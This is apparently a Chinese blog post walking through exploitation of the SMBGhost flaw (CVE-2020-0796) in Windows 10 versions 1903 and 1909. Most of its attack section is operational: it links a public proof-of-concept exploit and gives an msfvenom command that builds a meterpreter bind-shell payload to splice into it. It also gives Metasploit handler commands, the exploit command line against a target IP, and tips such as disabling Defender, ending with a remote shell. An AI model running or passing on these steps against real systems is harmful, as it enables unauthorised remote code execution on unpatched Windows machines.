msf win10漏洞_微软SMBv3 Client/Server远程代码执行漏洞CVE20200796

01

影响范围

025be398b4a530ea06b1d1a30e83149b.png

影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

02

漏洞复现

025be398b4a530ea06b1d1a30e83149b.png

EXP地址:

https://github.com/chompie1337/SMBGhost_RCE_PoC

  • Win10 版本有限制,具体我自己用的下面这个成功的

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

  • python 版本

python 3.6 可以成功!

python 3.7 和 2 实测蓝屏

  • payload要正向监听

  • 补丁也有坑,KB4551762讲道理是没有,但是win10的补丁,看见就那几个,但是那个补丁里面可能有包含这个补丁

  • 需要关闭defender防火墙

首先使用systeminfo看一下补丁(KB4551762)

  • msf生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

1852857b2d4ff25ccded0c9d34ba2a32.png

  • EXP替换shellcode

    把buf 替换成USER_PAYLOAD

7c9720960d82af56e0b0f22e816bc60e.png

use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcpset lport 6666set rhost 192.168.31.235run

a334fe8cb4b45786ee2c590b7d274053.pngee32ea7bee9858e7216e4004260e1b56.png

运行EXP

python3 exploit.py -ip 192.168.100.54

2f1a0ba206d747ca6a328569b4696639.png

最终拿到shell

7c70b1d1b101a327a052f101362693ca.png

a9d67628a4f5919e464d5b4501730644.png

白泽Sec

默默学习,默默共享

白阁投稿邮箱:

ByLibrary@163.com

白阁漏洞库:

www.bylibrary.cn

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值